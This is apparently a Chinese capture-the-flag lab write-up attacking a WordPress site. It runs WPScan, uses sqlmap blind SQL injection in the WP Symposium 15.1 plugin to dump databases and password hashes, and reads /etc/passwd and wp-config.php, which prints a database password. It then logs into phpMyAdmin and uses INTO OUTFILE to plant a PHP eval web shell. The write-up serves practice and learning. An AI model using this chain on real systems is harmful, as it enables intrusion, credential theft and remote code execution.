找了个靶场练练手，在此记一下。

0x00 信息收集

直接访问，是wordpress博客

Apache/2.4.10 (Debian)

使用御剑扫一下网站

http://218.2.197.234:2040/phpmyadmin/db_create.php
http://218.2.197.234:2040/phpmyadmin/index.php
http://218.2.197.234:2040/phpmyadmin/tbl_create.php
http://218.2.197.234:2040/wp-admin/admin-ajax.php
http://218.2.197.234:2040/wp-admin/install.php
http://218.2.197.234:2040/wp-login.phphttp://218.2.197.234:2040/readme.html

看样子有phpmyadmin，既然是wordpress博客，那么就用WPScan扫一下，找到两个有问题的插件

root@kali:~# wpscan -u "http://218.2.197.234:2040/" --enumerate p

[+] We found 2 plugins:

[+] Name: akismet
 |  Latest version: 3.3.4 
 |  Location: http://218.2.197.234:2040/wp-content/plugins/akismet/

[!] We could not determine a version so all vulnerabilities are printed out

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: wp-symposium - v15.1
 |  Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/
 |  Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt
[!] The version is out of date, the latest version is 15.8.1

而且知道了wordpress的版本为v4.3.1
主题是

[+] Name: twentyfifteen - v1.3
 |  Location: http://218.2.197.234:2040/wp-content/themes/twentyfifteen/
 |  Readme: http://218.2.197.234:2040/wp-content/themes/twentyfifteen/readme.txt
[!] The version is out of date, the latest version is 1.8
 |  Style URL: http://218.2.197.234:2040/wp-content/themes/twentyfifteen/style.css
 |  Theme Name: Twenty Fifteen
 |  Theme URI: https://wordpress.org/themes/twentyfifteen/
 |  Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/    

有个用户
​
​ [+] Enumerating usernames …
​ [+] Identified the following 1 user/s:
​ +—-+———–+———–+
​ | Id | Login | Name |
​ +—-+———–+———–+
​ | 1 | localhost | localhost |
​ +—-+———–+———–+

已经知道了只有这一个Web服务，就没必要用Nmap扫描了。

统计一下信息
​
​ Web容器 Apache/2.4.10 (Debian)
​ phpmyadmin
​
​ wordpress
​ 有两个脆弱的插件 Akismet 和 wp-symposium - v15.1
​ 主题是 twentyfifteen - v1.3
​ 一个用户 localhost

去网上寻找wp-symposium v15.1的漏洞

找到三个，全部都是SQL注入

CVE-2015-3325
WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection
https://www.exploit-db.com/exploits/37080/

CVE-2015-6522
WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection
https://www.exploit-db.com/exploits/37824/

WordPress Plugin WP Symposium 15.1 - Blind SQL Injection
https://www.exploit-db.com/exploits/37822/

0x01 漏洞利用

经过测试只有第三个可以注入成功，CVE-2015-6522在这个网站上没法查询别的数据，看源代码是没有过滤的，但是只能返回database(),version()等函数的值。

利用第三个盲注漏洞，使用SQLmap

将访问的请求包保存到txt文件里，使用-r参数

跑数据库

sqlmap -r "C:\Users\10904\Desktop\2040.txt" --dbs

回显
​
​ available databases [4]:
​ [] information_schema
​ [] mysql
​ [] performance_schema
​ [] wordpress

跑wordpress的表

sqlmap -r "C:\Users\10904\Desktop\2040.txt" -D "wordpress" --tables

回显

Database: wordpress             
[36 tables]                     
+------------------------------+
| wp_commentmeta               |
| wp_comments                  |
| wp_links                     |
| wp_options                   |
| wp_postmeta                  |
| wp_posts                     |
| wp_symposium_audit           |
| wp_symposium_cats            |
| wp_symposium_chat2           |
| wp_symposium_chat2_typing    |
| wp_symposium_chat2_users     |
| wp_symposium_comments        |
| wp_symposium_events          |
| wp_symposium_events_bookings |
| wp_symposium_extended        |
| wp_symposium_following       |
| wp_symposium_friends         |
| wp_symposium_gallery         |
| wp_symposium_gallery_items   |
| wp_symposium_group_members   |
| wp_symposium_groups          |
| wp_symposium_likes           |
| wp_symposium_lounge          |
| wp_symposium_mail            |
| wp_symposium_news            |
| wp_symposium_styles          |
| wp_symposium_subs            |
| wp_symposium_topics          |
| wp_symposium_topics_images   |
| wp_symposium_topics_scores   |
| wp_symposium_usermeta        |
| wp_term_relationships        |
| wp_term_taxonomy             |
| wp_terms                     |
| wp_usermeta                  |
| wp_users                     |
+------------------------------+

看名称，用户名和密码应该在wp_users中，直接跑数据

sqlmap -r "C:\Users\10904\Desktop\2040.txt" -D "wordpress" -T "wp_users" --dump

回显

Database: wordpress
Table: wp_users
[1 entry]
+----+----------+------------------------------------+------------+---------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass                          | user_login | user_email    | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------+------------------------------------+------------+---------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | <blank>  | $P$BoRvgt/kaEDWqyiq0a3U8QjUQAO6gQ0 | localhost  | test@test.com | 0           | localhost    | localhost     | 2015-10-11 10:10:07 | <blank>             |
+----+----------+------------------------------------+------------+---------------+-------------+--------------+---------------+---------------------+---------------------+

很明显，密码是被加密过的，根据网上资料可知强度很高，很难破解。

尝试从phpmyadmin入手，首先用SQLmap将数据库的用户名和密码跑出来

sqlmap -r "C:\Users\10904\Desktop\2040.txt" --current-user --password

回显

database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *AA59232D46C9C0751BA3069045A0B90F3C6431C4
[*] root [1]:
    password hash: *74ACCF7FB15CDBAEE88B9E7F7B58352D3308CFF2
[*] wordpress [1]:
    password hash: *A22BD9F95BF505E792C556FC1EF9FCFA6B6B5D9B

很遗憾，同样是加密过的，很难破解。

再换个方向，直接用sqlmap写Shell，但总是报错，看样子权限不够。没思路了。。

于是请教了下表哥，读文件+扫目录。
尝试用sqlmap读了下/etc/passwd，可以读。看样子读文件是有权限的，但是由于是盲注，读数据很慢。渗透网站的话可以读一下网站的配置文件，但是不知道绝对路径。可以猜：

Apache默认的网站路径为 /var/www/html/
wordpress在网站根目录存在wp-config.php的配置文件

尝试直接用sqlmap读取这个文件

sqlmap -r "C:\Users\10904\Desktop\2040.txt" --file-read "/var/www/html/wp-config.php" -p "topic_id"

运气不错，直接下载到本地了

 <?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'CxfKVWX5@xr5cqzb8');
define('DB_HOST', 'localhost');
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');
require_once(ABSPATH . 'wp-settings.php');

在这个文件里，我们可以获得wordpress用户的用户名和密码
​
​ Username: wordpress
​ Password: CxfKVWX5@xr5cqzb8

然后进入phpmyadmin,直接登录

http://218.2.197.234:2040/phpmyadmin

在其中的SQL语句执行窗口执行SQL语句，直接往网站根目录写文件也是没有权限的，会报错

select '<?php @eval($_POST[2333])?>'INTO OUTFILE '/var/www/html/123456789.php';

#1 - Can't create/write to file '/var/www/html/123456789.php' (Errcode: 13)

尝试更换写文件的路径，首先用DirBuster扫了下目录，有images和upload两个文件夹，这种目录的权限一般会低一些。

尝试

select '<?php @eval($_POST[2333])?>'INTO OUTFILE '/var/www/html/upload/123456789.php';
select '<?php @eval($_POST[2333])?>'INTO OUTFILE '/var/www/html/images/123456789.php';

成功在images中写入shell。

用菜刀连接，在网站目录下获得flag

flag{Hi_Web_fLaG_Is_HEre}   

PS: 如果已知flag在网站根目录的话，可以直接用sqlmap读取文件，不用拿Shell

0x02 收获&感想

1. 渗透测试中信息收集真的很重要，一旦忽略了什么，在测试过程中就更容易卡住。
2. 在测试中要打开自己的思路，要思考全面。比如写文件不行的话，可以读文件嘛，说白了，还是经验不足，练得少。
3. つ﹏⊂强行凑三条(逃